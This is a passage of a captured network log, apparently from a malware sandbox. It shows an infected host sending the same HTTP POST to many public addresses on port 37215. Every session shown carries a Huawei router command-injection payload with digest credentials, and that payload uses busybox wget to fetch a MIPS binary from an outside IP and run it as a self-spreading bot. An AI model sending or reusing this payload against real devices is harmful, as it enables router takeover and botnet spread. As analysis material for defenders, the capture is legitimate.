                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          553192.168.2.1556514197.225.115.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.565011024 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          554192.168.2.1541988197.146.116.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.565053940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          555192.168.2.1554304197.46.152.14937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.565080881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          556192.168.2.154188441.245.165.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.565141916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          557192.168.2.155845241.246.7.4337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.565181971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          558192.168.2.155394041.79.122.9637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.565236092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          559192.168.2.1552568157.245.173.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.591595888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          560192.168.2.1543156157.72.206.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.591615915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          561192.168.2.1543738177.247.30.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.591655970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          562192.168.2.1543848197.193.32.7437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.591665983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
